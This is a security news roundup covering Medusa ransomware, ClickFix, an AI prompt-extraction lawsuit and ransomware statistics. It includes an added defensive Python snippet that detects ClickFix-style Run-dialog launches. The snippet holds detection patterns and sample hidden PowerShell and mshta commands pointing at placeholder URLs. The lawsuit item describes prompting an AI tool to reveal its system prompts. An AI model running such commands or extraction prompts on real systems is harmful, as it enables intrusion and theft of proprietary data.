AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response

InfoSec News Nuggets 3/14/2025

Medusa Ransomware Made 300 Critical Infrastructure Victims 

Medusa was initially operated as a closed ransomware and, although it now uses an affiliate model, ransom negotiations are still conducted by the malware developers, CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) note in a joint alert. The group engages in double extortion, encrypting victims’ data but also stealing it and threatening to leak it unless a ransom is paid. Medusa’s operators offer payments ranging between $100 and $1 million to affiliates working exclusively for them, the three agencies say.


ClickFix Widely Adopted by Cybercriminals, APT Groups 

ClickFix is a social engineering technique in which malicious JavaScript code on web pages prompts the user to perform an action that results in the delivery of a malicious payload. Typically, the user sees a prompt instructing them to perform an update, fix an error, or verify that they are human on a fake reCAPTCHA page containing malicious code. The malicious JavaScript code copies a command to the clipboard, and the user is instructed to open the Windows Run dialog by pressing Win+R, paste the clipboard content with Ctrl+V, and hit Enter.
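As an added defender-side example (not part of the original post or the article it summarizes), the snippet below triages the execution step described above from two sources an incident responder already has: process-creation telemetry (fields modelled on Sysmon Event ID 1) and the per-user RunMRU registry key, which records Run dialog history. The interpreter list, the flag heuristics, and all sample data are assumptions constructed for the example.

```python
"""Triage helpers for ClickFix-style execution: commands pasted into the Windows
Run dialog. Checks process-creation telemetry (fields modelled on Sysmon Event
ID 1) and the per-user RunMRU registry key that records Run-dialog history.
All sample data below is constructed for this example."""
import re

# Script hosts a pasted one-liner typically launches (assumption; tune locally).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Window-hiding / encoding switches often paired with pasted commands (assumption).
FLAG_RE = re.compile(r"(?i)(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|nop|enc)\b")

def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def is_suspicious_run(event: dict) -> bool:
    """True when a script host starts directly under explorer.exe (the parent the
    Run dialog gives its children) with a URL or a listed flag on the command line."""
    if _basename(event["parent"]) != "explorer.exe":
        return False
    if _basename(event["image"]) not in INTERPRETERS:
        return False
    return bool(URL_RE.search(event["cmdline"]) or FLAG_RE.search(event["cmdline"]))

def triage(events: list) -> list:
    """Command lines worth an analyst's attention, in telemetry order."""
    return [e["cmdline"] for e in events if is_suspicious_run(e)]

def runmru_history(values: dict) -> list:
    """RunMRU entries most-recent first: each lettered value holds the command plus
    a literal backslash-1 suffix; MRUList gives the letters in recency order."""
    out = []
    for letter in values.get("MRUList", ""):
        data = values.get(letter)
        if data is not None:
            out.append(data[:-2] if data.endswith("\\1") else data)
    return out

# Constructed telemetry: ClickFix-like launch, benign Run-dialog launch,
# interpreter started from an admin's cmd.exe, and an mshta fetch.
EXPLORER, PS = r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": EXPLORER, "image": PS, "cmdline": 'powershell -w hidden "https://example.invalid/verify"'},
    {"parent": EXPLORER, "image": PS, "cmdline": "powershell Get-Date"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": PS, "cmdline": "powershell -w hidden Get-Date"},
    {"parent": EXPLORER, "image": r"C:\Windows\System32\mshta.exe", "cmdline": "mshta http://example.invalid/captcha"},
]
# Constructed RunMRU values, as exported from HKCU\...\Explorer\RunMRU.
SAMPLE_RUNMRU = {"a": "calc\\1", "b": 'powershell -w hidden "https://example.invalid/verify"\\1', "MRUList": "ba"}
```

Running `triage(SAMPLE_EVENTS)` flags only the two explorer.exe-parented script-host launches that carry a URL, while `runmru_history(SAMPLE_RUNMRU)` shows what the user actually pasted, which survives even if the spawned process left no telemetry.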


Trade Secrets Law Is Awkward Fit in AI Prompt-Hacking Lawsuit 

A medical AI company’s novel trade secrets lawsuit, accusing a rival of prompting its platform to reveal how it was built, illustrates the challenges artificial intelligence presents for protecting proprietary information. OpenEvidence Inc. in its complaint accused Pathway Medical Inc. of stealing medical credentials to gain access to its AI tool and employing prompts to have it reveal the “system prompts” OpenEvidence had used to create the platform. The suit levels claims including computer fraud, breach of contract, and hacking to gain access to copyrighted material, but the trade secrets claim stood out to attorneys and law professors as the most interesting.


Future of US digital security in jeopardy due to White House attacks on science organization, officials say 

If White House attempts to gut science and technology entities are successful, China will be poised to cripple U.S. communications, economic transactions, infrastructure, and even military operations, current and former government cybersecurity officials told Defense One. Recent White House efforts to fire workers across the federal government and freeze agencies’ spending hit another roadblock Thursday when a U.S. District Court judge ruled that planned firings of probationary workers across the government are unlawful. Last week, a different judge ruled that the Trump Administration doesn’t have the authority to freeze agency funding without Congress.


February was the worst month on record for ransomware attacks – and one threat group had a field day 

February 2025 was the worst month on record for the number of ransomware attacks, according to new research from Bitdefender. Analysis from the security company shows the number of ransomware attacks reached 962 last month, a significant increase over the year prior, when 425 attacks were recorded. Of those 962, 335 were claimed by the Ransomware as a Service (RaaS) group Clop – three times as many as the previous month.

